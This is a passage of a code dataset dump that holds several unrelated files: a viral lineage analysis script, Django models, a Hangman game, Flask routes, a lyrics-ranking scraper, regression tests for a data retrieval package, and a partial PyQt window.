lineage, we show the most common forms of {args.protein}, \"\n \"as well as their counts within (and percentages of) the lineage. \"\n \"[Note that if a lineage contains several divergent forms, \"\n \"the consensus form might not be found among these common forms.] \"\n \"Also shown is the Hamming distance (HD) between each form \"\n \"and the most common form in that lineage. Deletions relative to \"\n \"the baseline reference strain are indicated with a dash \"\n \"(e.g. the two amino acid deletion at positions 156-157 is \"\n \"indicated with 'E156-,F157-'), \"\n \"and insertions are denoted by a plus sign \"\n \"(e.g. an extra T at position 143 is written '+143T'). 
\")\n if args.baseline:\n print(f\"[Note: Mutation strings are relative to baseline {args.baseline}].\")\n if args.lineagebaseline:\n print(\"[Note: Mutation strings are relative to the most common variant in each lineage.]\")\n print()\n\n count_forms = f\"the {args.npatterns} most common\" if args.npatterns \\\n else \"all the\"\n min_count = \\\n f\" that have at least {args.mincount} counts \" \\\n \"(but we always show the most common form)\" \\\n if args.mincount>1 else \"\"\n consensus_always = \\\n \"And we always show the consensus form; \" \\\n \"this form has the most common amino acid at each position. \" \\\n if args.consensusalways else \"\"\n print(f\"We show {count_forms} forms{min_count}. {consensus_always}\")\n\ndef main(args):\n '''pangocommonforms main'''\n\n if args.baseline and args.lineagebaseline:\n raise RuntimeError('Cannot have both --baseline and --lineagebaseline')\n if not args.bylineage and args.lineagebaseline:\n v.print('Warning: not recommended to use --notbylineage AND --lineagebaseline.')\n\n print_header(args)\n\n firstseq,seqlist = cf.get_input_sequences(args)\n mut_manager = mutant.MutationManager(firstseq)\n\n last_days = f\" in the last {args.days} days from our last update,\"\n last_days = last_days if args.days else \"\"\n try:\n (f_date,t_date) = covid.range_of_dates(seqlist)\n except ValueError:\n (f_date,t_date) = ('Unknown','Unknown')\n\n print(f\"This output is based on sequences sampled{last_days} \"\n \"from %s to %s.\" % (f_date,t_date))\n\n ## Partition seqlist by lineages, separate list for each lineage\n lin_partition = cf.LineagePartition(seqlist)\n\n base_mut = cf.get_baseline_mutation(args.baseline,mut_manager,\n lin_partition,args.protein)\n\n if not args.bylineage:\n lin_partition = cf.LineagePartition(seqlist,bylineage=False)\n\n ## Print header for table:\n print()\n print(lin_partition.format(\"Pango\"),\n \"Lineage Form Form\")\n print(lin_partition.format(\"Lineage\"),\n \" Count Count Pct HD [Form as mutation string]\")\n\n for lin in lin_partition.lineages:\n\n seqlin = lin_partition.sequences[lin]\n countlin = lin_partition.counts[lin]\n fmtlin = lin_partition.format(lin)\n\n print()\n\n ## First get consensus form\n cons = cf.consensus(seqlin) if not args.consensusnever else None\n\n ## Now get most common forms\n cntr = Counter(s.seq for s in seqlin)\n cflag = False\n cntrlist = sorted(cntr,key=cntr.get,reverse=True)\n if args.npatterns:\n cntrlist = cntrlist[:args.npatterns]\n for n,comm in enumerate(cntrlist):\n cnt = cntr[comm]\n if n>0 and cnt < args.mincount:\n break\n cons_string = \"\"\n if comm == cons:\n cflag = True\n cons_string = \"(consensus)\"\n m = mut_manager.get_mutation(comm)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n\n if args.lineagebaseline:\n if n==0:\n lineage_baseline = m\n else:\n mstring = m.relative_to(lineage_baseline)\n\n if n == 0:\n top_comm = comm\n h = hamming(top_comm,comm)\n print(\"%s %7d %6d %5.1f%% %3d %s %s\" %\n (fmtlin,countlin,cnt,100*cnt/countlin,\n h,mstring,cons_string))\n if args.consensusalways and not cflag:\n h = hamming(top_comm,cons)\n m = mut_manager.get_mutation(cons)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n cnt = cntr[cons]\n print(\"%s %7d %6d %5.1f%% %3d %s %s\" %\n (fmtlin,countlin,cnt,100*cnt/countlin,\n h,mstring,\"(consensus)\"))\n\nif __name__ == \"__main__\":\n\n _args = getargs()\n v.verbosity(_args.verbose)\n\n 
main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"pangocommonforms.py","file_name":"pangocommonforms.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27497229943","text":"\nfrom django.db import models\nfrom django.db.models import Q, UniqueConstraint\nfrom django.contrib.auth import get_user_model\nfrom django.template.defaultfilters import slugify\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.exceptions import ValidationError\nfrom services.mixins import ModelDeleteMixin, ModelUpdateMixin\n\nfrom .querysets import DepartmentMemberQuerySet, DepartmentQuerySet, DesignationQuerySet\n\nUser = get_user_model()\n\n\nclass Department(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n CACHED_FIELDS = ['pk', 'name', 'description']\n restricted_fields = ['pk', 'slug']\n error_messages = {\n \"CREATE\": \"Department create failed.\",\n \"UPDATE\": \"Department update failed.\",\n \"DELETE\": \"Department delete failed.\",\n \"RETRIEVE\": \"Department retrieve failed.\",\n \"PATCH\": \"Department patch failed.\",\n }\n\n name = models.CharField(\n verbose_name=_(\"Department Name\"),\n max_length=200,\n null=False,\n unique=True,\n blank=False,\n )\n slug = models.SlugField(\n verbose_name=_(\"Department Name SLug\"),\n unique=True,\n null=False,\n )\n description = models.TextField(\n verbose_name=_(\"Department Description\"),\n null=False,\n blank=False,\n )\n objects = DepartmentQuerySet.as_manager()\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.name)\n self.clean()\n return super().save(*args, **kwargs)\n\n\nclass Designations(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n CACHED_FIELDS = ['pk', 'department', 'title']\n restricted_fields = ['pk']\n error_messages = {\n \"CREATE\": \"Designation create failed.\",\n \"UPDATE\": \"Designation update failed.\",\n \"DELETE\": \"Designation delete failed.\",\n \"RETRIEVE\": \"Designation retrieve failed.\",\n \"PATCH\": \"Designation patch failed.\",\n }\n\n department = models.ForeignKey(\n to=Department,\n on_delete=models.CASCADE,\n related_name=\"department_designations\",\n verbose_name=_(\"Department Designations\")\n )\n title = models.CharField(\n verbose_name=_(\"Designation Title\"),\n max_length=100,\n null=False,\n blank=False,\n )\n objects = DesignationQuerySet.as_manager()\n\n class Meta:\n unique_together = [['department', 'title']]\n\n\n def __str__(self):\n return '{}-{}'.format(self.department, self.title)\n\n\nclass DepartmentMember(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n restricted_fields = ['pk', 'member', '']\n error_messages = {\n \"CREATE\": \"Department create failed.\",\n \"UPDATE\": \"Department update failed.\",\n \"DELETE\": \"Department delete failed.\",\n \"RETRIEVE\": \"Department retrieve failed.\",\n \"PATCH\": \"Department patch failed.\",\n \"DEPARTMENT_MISMATCH\": \"Member department and department designation did not match.\",\n \"MULTIPLE_DEPARTMENT_HEAD\": \"Department Head of this department already exist\"\n }\n\n member = models.OneToOneField(\n to=User,\n on_delete=models.CASCADE,\n related_name=\"user_department\",\n null=False,\n blank=False,\n verbose_name=_(\"Member\"),\n primary_key=True,\n )\n department = models.ForeignKey(\n to=Department,\n on_delete=models.CASCADE,\n related_name=\"department_members\",\n null=False,\n blank=False,\n verbose_name=\"Department\"\n )\n 
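# The designation must belong to this same department; clean() below enforces the match,\n    # and the UniqueConstraint in Meta allows at most one head (is_head=True) per department.\n    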
designation = models.ForeignKey(\n to=Designations,\n on_delete=models.RESTRICT,\n null=False,\n blank=False,\n verbose_name=\"designated_members\"\n )\n is_head = models.BooleanField(\n verbose_name=_(\"Department Head\"),\n default=False,\n )\n department_name = models.CharField(\n verbose_name=_(\"Department Name\"),\n max_length=200,\n null=True,\n blank=True,\n default=None\n )\n designation_title = models.CharField(\n verbose_name=_(\"Designation Title\"),\n max_length=100,\n null=True,\n blank=True,\n default=None\n )\n objects = DepartmentMemberQuerySet.as_manager()\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=[\"department\"],\n condition=Q(is_head=True),\n name=\"one_head_per_department\"\n )\n ]\n def __str__(self):\n return \"{}\".format(self.member.first_name)\n\n def clean(self):\n if self.department != self.designation.department:\n raise ValidationError({\"detail\": [self.error_messages[\"DEPARTMENT_MISMATCH\"]]})\n\n def save(self, *args, **kwargs):\n self.clean()\n super().save(*args, **kwargs)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"pi3o1416/task-management","sub_path":"department/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18994363280","text":"from random import choice\nimport time\nwith open(\"Words.txt\") as f:\n Words = f.readlines()\n\nThe_Dict = {}\nfor i in range(len(Words)):\n The_Dict.update({Words[i].split(\".\")[0]:Words[i].split(\".\")[1]})\n\n \n# Extracting Word from the dictionary to a list\nWord_List = []\nfor items in The_Dict.keys():\n Word_List.append(items)\n\n# Function for Extracting a random word from the Given List\ndef RanWord(List):\n return choice(List)\n\n# Function for analysing the user input in the word \ndef Analysis(Word ,UserInput):\n No_Of_Occurence = Word.count(UserInput)\n if No_Of_Occurence == 1:\n return [Word.index(UserInput)]\n \n elif No_Of_Occurence >= 2:\n O1 = Word.index(UserInput)\n O2 = Word.rindex(UserInput)\n return [O1,O2] \n\n elif No_Of_Occurence == 0:\n return []\n \n#Function for Filtering the word for More then 2 occurence of a given input \ndef Filter(Word, UserInput, IndexList):\n No_Of_Occurence = Word.count(UserInput)\n \n if No_Of_Occurence>len(IndexList):\n \n while No_Of_Occurence >= len(IndexList):\n Sliced_Word = Word[IndexList[-2]+1:IndexList[-1]]\n \n a = Sliced_Word.find(UserInput)\n b = Sliced_Word.rfind(UserInput)\n \n if a != None and b == None:\n IndexList.append(a + len(Word[:IndexList[-2]+1]))\n elif a != None and b != None:\n IndexList.append(a + len(Word[:IndexList[-2]+1]))\n IndexList.append(b + len(Word[:IndexList[-1]-1]))\n Filter(Word, UserInput, IndexList)\n\n return IndexList.pop(len(IndexList)-1)\n else:\n return IndexList\n\n# Function for Replacing the dash Dashed List with the User input\ndef Dash_Replace(DashList, IndexList, UserInput):\n if len(IndexList) == 0:\n DashList = DashList \n else:\n for Index in IndexList:\n DashList.pop(Index)\n DashList.insert(Index, UserInput)\n return DashList\n\n# Function for Replacing the word with New word with removed alphabets\ndef Word_Replace(New_Word, UserInput):\n \n return New_Word.replace(UserInput, \"\")\n\ndef Main_Game():\n # Generating the Random Word\n Word = RanWord(Word_List) \n New_Word = Word \n\n # Generating the DashList for Word\n DashList = []\n for i in range(len(Word)):\n DashList.append(\"_ \")\n\n # Generating the Dashlist for Hangman\n H_Dashlist = [\"_ \",\"_ 
\",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \"]\n HangManList = [\"Y\",\"O\", \"U\", \"H\", \"A\", \"N\", \"G\", \"M\", \"A\", \"N\"]\n HangmanEnd = []\n Already_Guessed = []\n i = 0\n while i<11:\n \n # print(\"\\nTo Quit Enter 'QUIT'\\n\".center(100))\n print(f'ChancesLeft:{10-i}\\n'.center(100))\n if (10-i) ==1:\n print(\"Last Chance!!\\n\".center(100)) \n\n # Making the Dashed String for Hangman\n \n H_Dash_Str = \"\"\n for j in range(len(H_Dashlist)):\n H_Dash_Str = H_Dash_Str + H_Dashlist[j]\n print(H_Dash_Str.center(100),\"\\n\")\n\n # Making a Dashed String for Word\n \n Dash_Str = \"\".center(42)\n for k in range(len(DashList)):\n Dash_Str = Dash_Str + DashList[k]\n print(Dash_Str,\"\\n\")\n print(f\"HINT:{The_Dict.get(Word)}\".center(100),)\n\n # Setting the Loosing game Settings\n \n if H_Dash_Str == 'YOUHANGMAN':\n print(f\"You Loose the Game The Word Was:{Word}\\n\".center(100))\n break\n else:\n try:\n if New_Word == \"\":\n print(\"******************You Won the Game!*******************\\n\".center(100))\n print(\"********************************************************************************************************************************\".center(20))\n time.sleep(2)\n break\n else:\n # Taking the User's Input\n UserInput = input(\"Enter Your Guess: \\n\".center(100)).capitalize()\n \n if UserInput in Already_Guessed:\n print(f\"You Already guessed {UserInput}\".center(100))\n else:\n if UserInput in New_Word:\n # Generating the Index List\n IndexList = Analysis(Word, UserInput)\n # print(IndexList, 'From Program') # ERROR CHECKING HERE\n Filter(Word, UserInput, IndexList)\n # print(IndexList, 'After filter') # ERROR CHECKING\n\n # Generating the DashList with Replaced word\n DashList = Dash_Replace(DashList, IndexList, UserInput)\n \n # print(DashList) # CHECKING FOR ERROR!\n\n # Genrating the New Word\n New_Word = Word_Replace(New_Word, UserInput)\n # print(New_Word)\n # print(Word) # SETTED HERE FOR CHECKING FOR AN ERROR.\n print(\"Your Guess was True!\".center(100))\n Already_Guessed.append(UserInput)\n\n elif UserInput not in New_Word:\n print(\"Your Guess was Wrong!\\n\".center(100))\n H_Dashlist.pop(i)\n H_Dashlist.insert(i, HangManList[i])\n HangmanEnd.append(i)\n i += 1 \n except Exception as e:\n print(\"You Just Entered Something Wrong raising error\", e,\"Please Try Again!\") \n \n print(\"****************************************************************************************************\".center(30))\n time.sleep(1)\n YourChoise = input(\"To Play Again Enter 'Y' else 'N':\".center(60)).capitalize()\n if YourChoise == \"Y\":\n Main_Game()\n else:\n print(\"*********************************Thanks for playing!**************************\".center(100))\n time.sleep(3)\n quit()\n \nMain_Game()\n","repo_name":"Jitesh-Chaturvedy/HANGMAN","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":6253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73977761794","text":"from models.clients import clients\nfrom flask import request, jsonify\n#from model import db\n\n\n@app.route(\"/clients/\", methods=[\"GET\"])\ndef find_client(client_id: str) -> Any:\n \"\"\"Поиск клиента по id.\"\"\"\n client = Client()\n try:\n response = client.get_client_info(client_id)\n if response is None:\n return Response(\"Объект в базе не найден.\", status=404)\n return str(response)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n\n@app.route(\"/clients/\", 
methods=[\"POST\"])\ndef create_client() -> Response:\n \"\"\"Создание записи о клиенте.\"\"\"\n client_info = request.get_json()\n try:\n client = Client(id=client_info[\"id\"], name=client_info[\"name\"])\n client.create_client()\n return Response(\"Запись создана.\", status=201)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n\n@app.route(\"/clients/\", methods=[\"DELETE\"])\ndef delete_client(client_id: str) -> Response:\n \"\"\"Удаление клиента из системы.\"\"\"\n client = Client()\n try:\n response = client.get_client_info(client_id)\n if response is None:\n return Response(\"Объект в базе не найден.\", status=404)\n client.delete_client(client_id)\n return Response(\"Удалено.\", status=201)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n","repo_name":"ArkadiyVoronov/OnyxTaxi","sub_path":"views/view_clients.py","file_name":"view_clients.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17935646468","text":"#!/usr/bin/python3\n\n\n# UtaTenの歌詞ランキングTop30を取得する\nimport requests, bs4\n\n\n# リクエストとスープ\ndef requesoup(url):\n return bs4.BeautifulSoup(requests.get(url).text, 'lxml')\n\n\n# 歌詞情報を取ってくる\ndef songRank(page):\n elem_box = ['SongRank SongName SingerName']\n for elem in page.find_all('article', class_='lst_boxArea'):\n songRank = elem.find('span', class_='icoTxt_rank').string.strip()\n songName = elem.find('h3', class_='boxArea_ttl').string.strip()\n singerName = elem.find('p', class_='boxArea_artists').string.strip()\n elem_set = '{} {} {}'.format(songRank, songName, singerName)\n elem_box.append(elem_set)\n return elem_box\n\n\n# 表示\ndef display(d):\n print(d)\n\n\n# 実行\nif __name__ == '__main__':\n url = 'https://utaten.com/lyricPvRanking/index'\n display('UtaTen歌詞ランキングTOP30!')\n for rank in songRank(requesoup(url)):\n display(rank)\n","repo_name":"n18001/life_hack","sub_path":"songrank.py","file_name":"songrank.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37822189758","text":"from __future__ import absolute_import\n\nimport imp\nimport numpy as np\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport sys\n\nimport time\n\nfrom imp import reload\n\nfrom retriever import download\nfrom retriever import fetch\nfrom retriever import install_csv\nfrom retriever import install_json\nfrom retriever import install_mysql\nfrom retriever import install_postgres\nfrom retriever import install_sqlite\nfrom retriever import install_xml\nfrom retriever.lib.defaults import ENCODING, DATA_DIR\nfrom retriever.lib.load_json import read_json\n\nencoding = ENCODING.lower()\n\nreload(sys)\nif hasattr(sys, 'setdefaultencoding'):\n sys.setdefaultencoding(encoding)\nimport pytest\nfrom retriever.lib.engine_tools import getmd5\nfrom retriever.engines import engine_list\n\n# Set postgres password, Appveyor service needs the password given\n# The Travis service obtains the password from the config file.\nos_password = \"\"\npgdb_host = \"localhost\"\nmysqldb_host = \"localhost\"\ntestdb_retriever = \"testdb_retriever\"\ntestschema = \"testschema_retriever\"\n\nif os.name == \"nt\":\n os_password = \"Password12!\"\n\ndocker_or_travis = os.environ.get(\"IN_DOCKER\")\nif docker_or_travis == \"true\":\n os_password = 'Password12!'\n pgdb_host = \"pgdb_retriever\"\n mysqldb_host = \"mysqldb_retriever\"\n\nmysql_engine, 
postgres_engine, sqlite_engine, msaccess_engine, \\\ncsv_engine, download_engine, json_engine, xml_engine = engine_list\nfile_location = os.path.dirname(os.path.realpath(__file__))\nretriever_root_dir = os.path.abspath(os.path.join(file_location, os.pardir))\nworking_script_dir = os.path.abspath(os.path.join(retriever_root_dir, \"scripts\"))\nHOMEDIR = os.path.expanduser('~')\nscript_home = '{}/.retriever/scripts'.format(HOMEDIR)\n\ndownload_md5 = [\n ('mt-st-helens-veg', 'd5782e07241cb3fe9f5b2e1bb804a794'),\n ('bird-size', '45c7507ae945868c71b5179f7682ea9c'),\n ('mammal-masses', 'b54b80d0d1959bdea0bb8a59b70fa871')\n]\n\ndb_md5 = [\n ('flensburg_food_web', '89c8ae47fb419d0336b2c22219f23793'),\n ('bird_size', '98dcfdca19d729c90ee1c6db5221b775'),\n ('mammal_masses', '6fec0fc63007a4040d9bbc5cfcd9953e')\n]\n\nspatial_db_md5 = [\n (\"test-eco-level-four\", [\"gid\", \"us_l3code\", \"na_l3code\",\"na_l2code\"], 'd1c01d8046143e9700f5cf92cbd6be3d'),\n (\"test-raster-bio1\", [\"rid\", \"filename\"], '27e0472ddc2da9fe807bfb48b786a251'),\n (\"test-raster-bio2\", [\"rid\", \"filename\"], '2983a9f7e099355db2ce2fa312a94cc6'),\n (\"test-us-eco\", [\"gid\", \"us_l3code\", \"na_l3code\", \"na_l2code\"], 'eaab9fa30c745557ff6ba7c116910b45')\n]\n\n\n# Tuple of (dataset_name, list of dict values corresponding to a table)\nfetch_tests = [\n ('iris',\n [{'Iris': [[5.1, 3.5, 1.4, 0.2, 'Iris-setosa'],\n ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'classes']]\n }]\n ),\n ('flensburg-food-web',\n [{'nodes': [\n [2, 2, 1, 'Adult', 2.1, 'Carrion', 'Detritus', 'Detritus/Stock', 'Assemblage',\n '', '', '', '', '', None, None, 'Low', '', None, None, None, None, None, None,\n None, None, '', '', None, None, '', None, '', None, None, None, '', '', '',\n None, None],\n ['node_id', 'species_id', 'stage_id', 'stage', 'species_stageid', 'workingname',\n 'organismalgroup', 'nodetype', 'resolution', 'resolutionnotes', 'feeding',\n 'lifestylestage', 'lifestylespecies', 'consumerstrategystage', 'systems',\n 'habitataffiliation', 'mobility', 'residency', 'nativestatus',\n 'bodysize_g', 'bodysizeestimation', 'bodysizenotes', 'bodysizen',\n 'biomass_kg_ha', 'biomassestimation', 'biomassnotes', 'kingdom', 'phylum',\n 'subphylum', 'superclass', 'classes', 'subclass', 'ordered', 'suborder',\n 'infraorder', 'superfamily', 'family', 'genus', 'specific_epithet', 'subspecies',\n 'node_notes']\n ],\n 'links': [\n [39, 79, 39, 79, 1, 1, 14, 'Concomitant Predation on Symbionts',\n None, None, None, None, None, None, None,\n None],\n ['consumernodeid', 'resourcenodeid', 'consumerspeciesid', 'resourcespeciesid',\n 'consumerstageid', 'resourcestageid', 'linknumber', 'linktype', 'linkevidence',\n 'linkevidencenotes', 'linkfrequency', 'linkn',\n 'dietfraction', 'consumptionrate', 'vectorfrom', 'preyfrom']\n ]\n }])\n]\n\nfetch_order_tests = [\n ('acton-lake',\n ['ActonLakeDepth', 'ActonLakeIntegrated', 'StreamDischarge', 'StreamNutrients',\n 'SiteCharacteristics']\n ),\n ('forest-plots-michigan',\n ['all_plots_1935_1948', 'all_plots_1974_1980', 'swamp', 'species_codes',\n 'upland_plots_1989_2007', 'sampling_history']\n )\n]\n\npython_files = ['flensburg_food_web']\n\n\ndef setup_module():\n \"\"\"Update retriever scripts and cd to test directory to find data.\"\"\"\n os.chdir(retriever_root_dir)\n subprocess.call(['cp', '-r', 'test/raw_data', retriever_root_dir])\n\n\ndef teardown_module():\n \"\"\"Cleanup temporary output files and return to root directory.\"\"\"\n os.chdir(retriever_root_dir)\n 
shutil.rmtree(os.path.join(retriever_root_dir, 'raw_data'))\n subprocess.call(['rm', '-r', 'testdb_retriever.sqlite'])\n\n\ndef get_script_module(script_name):\n \"\"\"Load a script module\"\"\"\n if script_name in python_files:\n file, pathname, desc = imp.find_module(script_name,\n [working_script_dir])\n return imp.load_module(script_name + '.py', file, pathname, desc)\n return read_json(os.path.join(retriever_root_dir, 'scripts', script_name))\n\n\ndef get_csv_md5(dataset, engine, tmpdir, install_function, config, cols=None):\n workdir = tmpdir.mkdtemp()\n src = os.path.join(retriever_root_dir, 'scripts')\n dest = os.path.join(str(workdir), 'scripts')\n subprocess.call(['cp', '-r', src, dest])\n workdir.chdir()\n final_direct = os.getcwd()\n engine.script_table_registry = {}\n engine_obj = install_function(dataset.replace('_', '-'), **config)\n time.sleep(5)\n engine_obj.to_csv(select_columns=cols)\n # need to remove scripts before checking md5 on dir\n subprocess.call(['rm', '-r', 'scripts'])\n current_md5 = getmd5(data=final_direct, data_type='dir')\n os.chdir(retriever_root_dir)\n return current_md5\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_sqlite_regression(dataset, expected, tmpdir):\n \"\"\"Check for sqlite regression.\"\"\"\n subprocess.call(['rm', '-r', 'testdb_retriever.sqlite'])\n dbfile = 'testdb_retriever.sqlite'\n if os.path.exists(dbfile):\n subprocess.call(['rm', '-r', dbfile])\n # SQlite should install datasets into a different folder from where .csv are dumped\n # This avoids having the `testdb.sqlite` being considered for md5 sum\n sqlite_engine.opts = {\n 'engine': 'sqlite',\n 'file': dbfile,\n 'table_name': '{db}_{table}',\n 'data_dir': DATA_DIR}\n interface_opts = {'file': dbfile, 'data_dir': retriever_root_dir}\n assert get_csv_md5(dataset, sqlite_engine, tmpdir, install_sqlite, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_postgres_regression(dataset, expected, tmpdir):\n \"\"\"Check for postgres regression.\"\"\"\n cmd = 'psql -U postgres -d ' + testdb_retriever + ' -h ' + pgdb_host + ' -w -c \\\"DROP SCHEMA IF EXISTS ' + testschema + ' CASCADE\\\"'\n subprocess.call(shlex.split(cmd))\n postgres_engine.opts = {'engine': 'postgres',\n 'user': 'postgres',\n 'password': os_password,\n 'host': pgdb_host,\n 'port': 5432,\n 'database': testdb_retriever,\n 'database_name': testschema,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": 'postgres',\n \"password\": postgres_engine.opts['password'],\n 'host': postgres_engine.opts['host'],\n 'port': postgres_engine.opts['port'],\n \"database\": postgres_engine.opts['database'],\n \"database_name\": postgres_engine.opts['database_name'],\n \"table_name\": postgres_engine.opts['table_name']}\n assert get_csv_md5(dataset, postgres_engine, tmpdir, install_postgres, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_mysql_regression(dataset, expected, tmpdir):\n cmd = 'mysql -u travis -Bse \"DROP DATABASE IF EXISTS {testdb_retriever}\"'.format(testdb_retriever=testdb_retriever)\n subprocess.call(shlex.split(cmd))\n mysql_engine.opts = {'engine': 'mysql',\n 'user': 'travis',\n 'password': '',\n 'host': mysqldb_host,\n 'port': 3306,\n 'database_name': testdb_retriever,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": mysql_engine.opts['user'],\n # 'password': mysql_engine.opts['password'],\n 'host': mysql_engine.opts['host'],\n 'port': mysql_engine.opts['port'],\n 
\"database_name\": mysql_engine.opts['database_name'],\n \"table_name\": mysql_engine.opts['table_name']}\n assert get_csv_md5(dataset, mysql_engine, tmpdir, install_mysql, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_xmlengine_regression(dataset, expected, tmpdir):\n \"\"\"Check for xmlenginee regression.\"\"\"\n xml_engine.opts = {\n 'engine': 'xml',\n 'table_name': '{db}_output_{table}.xml',\n 'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.xml'}\n assert get_csv_md5(dataset, xml_engine, tmpdir, install_xml, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_jsonengine_regression(dataset, expected, tmpdir):\n \"\"\"Check for jsonenginee regression.\"\"\"\n json_engine.opts = {\n 'engine': 'json',\n 'table_name': '{db}_output_{table}.json',\n 'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.json'}\n assert get_csv_md5(dataset, json_engine, tmpdir, install_json, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_csv_regression(dataset, expected, tmpdir):\n \"\"\"Check csv regression.\"\"\"\n csv_engine.opts = {\n 'engine': 'csv',\n 'table_name': '{db}_output_{table}.csv',\n 'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.csv'}\n assert get_csv_md5(dataset, csv_engine, tmpdir, install_csv, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", download_md5)\ndef test_download_regression(dataset, expected):\n \"\"\"Test download regression.\"\"\"\n os.chdir(retriever_root_dir)\n download(dataset, \"raw_data/{0}\".format(dataset))\n current_md5 = getmd5(data=\"raw_data/{0}\".format(dataset), data_type='dir')\n assert current_md5 == expected\n\n\n# @pytest.mark.parametrize(\"dataset, expected\", fetch_tests)\ndef test_fetch():\n \"\"\"Test fetch interface\"\"\"\n for dataset, expected in fetch_tests:\n data_frame = fetch(dataset)\n for itm in expected:\n for table_i in itm:\n expected_data = itm[table_i][0]\n expected_column_values = itm[table_i][1]\n column_values = list(data_frame[table_i].dtypes.index)\n first_row_data = list(data_frame[table_i].iloc[0])\n assert expected_data == first_row_data\n assert expected_column_values == column_values\n\n\ndef test_interface_table_registry():\n # Test if script_table_registry keeps only the latest\n # table names of the installed data packages in\n # script_table_registry\n install_csv(\"iris\")\n wine_data = fetch(\"wine-composition\")\n assert \"iris\" not in wine_data.keys()\n\n\n@pytest.mark.parametrize(\"dataset, expected\", fetch_order_tests)\ndef test_fetch_order(dataset, expected):\n \"\"\"Test fetch dataframe order\"\"\"\n data_frame_dict = fetch(dataset)\n assert list(data_frame_dict.keys()) == expected\n\n@pytest.mark.parametrize(\"dataset, cols, expected\", spatial_db_md5)\ndef test_postgres_spatial(dataset, cols, expected, tmpdir):\n \"\"\"Check for postgres regression.\"\"\"\n cmd = 'psql -U postgres -d ' + testdb_retriever + ' -h ' + pgdb_host + ' -w -c \\\"DROP SCHEMA IF EXISTS ' + testschema + ' CASCADE\\\"'\n subprocess.call(shlex.split(cmd))\n postgres_engine.opts = {'engine': 'postgres',\n 'user': 'postgres',\n 'password': os_password,\n 'host': pgdb_host,\n 'port': 5432,\n 'database': testdb_retriever,\n 'database_name': testschema,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": 'postgres',\n # \"password\": postgres_engine.opts['password'],\n 'host': 
    postgres_engine.opts = {'engine': 'postgres',\n                            'user': 'postgres',\n                            'password': os_password,\n                            'host': pgdb_host,\n                            'port': 5432,\n                            'database': testdb_retriever,\n                            'database_name': testschema,\n                            'table_name': '{db}.{table}'}\n    interface_opts = {\"user\": 'postgres',\n                      # \"password\": postgres_engine.opts['password'],\n                      'host': postgres_engine.opts['host'],\n                      'port': postgres_engine.opts['port'],\n                      \"database\": postgres_engine.opts['database'],\n                      \"database_name\": postgres_engine.opts['database_name'],\n                      \"table_name\": postgres_engine.opts['table_name']}\n    assert get_csv_md5(dataset, postgres_engine, tmpdir, install_postgres, interface_opts, cols) == expected\n","repo_name":"OwenMcDonnell/retriever","sub_path":"test/test_regression.py","file_name":"test_regression.py","file_ext":"py","file_size_in_byte":13524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
{"seq_id":"70046941956","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nimport sys\n\n\n# NOTE: the original snippet used `self.` at module level, which cannot run;\n# the statements are wrapped in a QMainWindow subclass here so the file is valid.\nclass OptionsWindow(QMainWindow):\n\n    def __init__(self):\n        super(OptionsWindow, self).__init__()\n        self.change_record_button = QPushButton(\"Change Student's Record\")\n        self.change_recordFont = QFont()\n        self.change_recordFont.setPointSize(13)\n        self.change_record_button.setFont(self.change_recordFont)\n        self.change_record_button.setMinimumSize(10,30)\n        self.change_difficulty_button = QPushButton(\"Change Game Difficulty\")\n        self.change_difficultyFont = QFont()\n        self.change_difficultyFont.setPointSize(13)\n        self.change_difficulty_button.setFont(self.change_difficultyFont)\n        self.change_difficulty_button.setMinimumSize(10,30)\n        self.clear_data_button = QPushButton(\"Clear all data from school file\")\n        self.clear_dataFont = QFont()\n        self.clear_dataFont.setPointSize(13)\n        self.clear_data_button.setFont(self.clear_dataFont)\n        self.clear_data_button.setMinimumSize(10,30)\n\n        self.layout 